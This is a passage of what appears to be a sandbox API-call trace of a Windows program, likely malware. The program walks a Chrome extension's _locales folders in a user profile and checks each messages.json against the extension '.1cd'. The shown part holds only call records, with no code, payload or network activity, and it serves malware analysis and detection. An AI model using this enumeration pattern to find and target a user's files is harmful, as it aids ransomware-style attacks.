lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0052.796] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko") returned 139 [0052.796] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1700 [0052.796] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.796] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.797] lstrlenW (lpString="messages.json") returned 13 [0052.797] lstrlenW (lpString=".1cd") returned 4 [0052.797] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.797] FindClose (in: hFindFile=0x3ef1700 | out: hFindFile=0x3ef1700) returned 1 [0052.797] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.797] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0052.797] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt") returned 139 [0052.797] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1700 [0052.797] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.797] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.797] lstrlenW (lpString="messages.json") returned 13 [0052.797] lstrlenW (lpString=".1cd") returned 4 [0052.797] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.798] FindClose (in: hFindFile=0x3ef1700 | out: hFindFile=0x3ef1700) returned 1 [0052.798] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.798] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0052.798] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv") returned 139 [0052.798] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1700 [0052.799] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.799] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.799] lstrlenW (lpString="messages.json") returned 13 [0052.799] lstrlenW (lpString=".1cd") returned 4 [0052.799] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.799] FindClose (in: hFindFile=0x3ef1700 | out: hFindFile=0x3ef1700) returned 1 [0052.799] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.799] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0052.799] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl") returned 139 [0052.800] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1700 [0052.800] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.800] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.800] lstrlenW (lpString="messages.json") returned 13 [0052.800] lstrlenW (lpString=".1cd") returned 4 [0052.800] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.800] FindClose (in: hFindFile=0x3ef1700 | out: hFindFile=0x3ef1700) returned 1 [0052.800] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.800] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0052.800] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no") returned 139 [0052.800] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1700 [0052.801] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.801] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c12fb00, ftLastWriteTime.dwHighDateTime=0x1d0f3ee, nFileSizeHigh=0x0, nFileSizeLow=0x9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.801] lstrlenW (lpString="messages.json") returned 13 [0052.801] lstrlenW (lpString=".1cd") returned 4 [0052.801] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c12fb00, ftLastWriteTime.dwHighDateTime=0x1d0f3ee, nFileSizeHigh=0x0, nFileSizeLow=0x9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.801] FindClose (in: hFindFile=0x3ef1700 | out: hFindFile=0x3ef1700) returned 1 [0052.801] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.801] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0052.802] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl") returned 139 [0052.802] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1700 [0052.802] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.802] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.802] lstrlenW (lpString="messages.json") returned 13 [0052.802] lstrlenW (lpString=".1cd") returned 4 [0052.802] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.802] FindClose (in: hFindFile=0x3ef1700 | out: hFindFile=0x3ef1700) returned 1 [0052.802] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.802] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0052.802] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR") returned 142 [0052.802] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1700 [0052.803] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.803] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.803] lstrlenW (lpString="messages.json") returned 13 [0052.803] lstrlenW (lpString=".1cd") returned 4 [0052.803] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.803] FindClose (in: hFindFile=0x3ef1700 | out: hFindFile=0x3ef1700) returned 1 [0052.804] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.804] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt_PT", cAlternateFileName="")) returned 1 [0052.804] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT") returned 142 [0052.804] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1700 [0052.804] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, 